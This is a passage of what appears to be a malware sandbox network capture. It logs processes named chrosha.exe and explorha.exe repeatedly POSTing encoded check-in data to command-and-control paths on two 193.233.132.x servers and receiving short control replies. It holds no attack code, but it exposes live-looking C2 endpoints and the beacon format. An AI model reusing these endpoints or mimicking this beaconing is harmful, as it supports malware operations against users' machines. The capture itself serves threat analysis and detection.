                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:06.177108049 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1115 | 192.168.2.5 | 50969 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:06.154244900 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:06.405172110 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1116 | 192.168.2.5 | 50970 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:06.408929110 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:06.654310942 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1117 | 192.168.2.5 | 50971 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:06.533596039 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:06.785207987 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1118 | 192.168.2.5 | 50972 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:07.005912066 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:07.250016928 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1119 | 192.168.2.5 | 50973 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:07.039937019 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:07.294547081 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1120 | 192.168.2.5 | 50974 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:07.505484104 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:07.759339094 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1121 | 192.168.2.5 | 50975 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:07.649529934 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:07.897568941 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1122 | 192.168.2.5 | 50976 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:08.125196934 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:08.372778893 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1123 | 192.168.2.5 | 50977 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:08.152297974 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:08.403275013 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1124 | 192.168.2.5 | 50978 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:08.626852036 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:08.875752926 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1125 | 192.168.2.5 | 50979 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:08.762506962 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:09.009022951 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1126 | 192.168.2.5 | 50980 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:09.233042955 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:09.473926067 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1127 | 192.168.2.5 | 50981 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:09.267402887 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:09.524271011 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1128 | 192.168.2.5 | 50982 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:09.725752115 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:09.976305008 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1129 | 192.168.2.5 | 50983 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:09.880737066 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:10.124952078 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1130 | 192.168.2.5 | 50984 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:10.342417002 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:10.593863010 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1131 | 192.168.2.5 | 50985 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:10.367902040 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
